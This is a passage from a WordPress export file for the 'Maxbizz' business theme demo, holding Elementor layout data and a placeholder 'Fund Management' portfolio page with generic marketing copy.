organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"c495c3b","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"775f38a","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2cd8973","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"58c9cc0","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"2445eaa","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6d2c9a2","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"da00c52","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"f598668","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"ab265f0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"55fc6a1","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"4257c97","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"766b84c","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"3a2e261","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"cff0610","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"db00145","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"6976f4f","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"f283648","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"ec1508e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"f627cdd","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4de80ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Fund Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/fund-management/</link>
		<pubDate>Fri, 11 Sep 2020 07:02:07 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=822</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>October 02, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>822</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:02:07]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:02:07]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[fund-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[823]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4b87d4ec","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"f7bb697","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1a84b099","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1b756974","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"474af26d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"504f8cda","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1a48f134","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8c88c53","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"196761d3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7b262c88","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7a91d778","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"50b0e82d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5a058e3b","elType":"widget","settings":{"editor":"<p>October 02, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"662d291f","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"254317b1","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6d56a150","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"37b90133","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9e89dbb","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"8c8f16f","elType":"section","settings":[],"elements":[{"id":"ece8c16","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1a3ad6f","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6f1d333","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"500a844","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"ae3cc52","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"f35a061","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c182153","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"d62857c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"6fb4a2f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"c72c30f","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f9716ea","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5b85cec","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"f829eeb","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5e8639f","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"21fed70","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"056740f","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"4a7002d","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"cdf05f0","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e04862c","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"75b4eab","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5d41059","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely 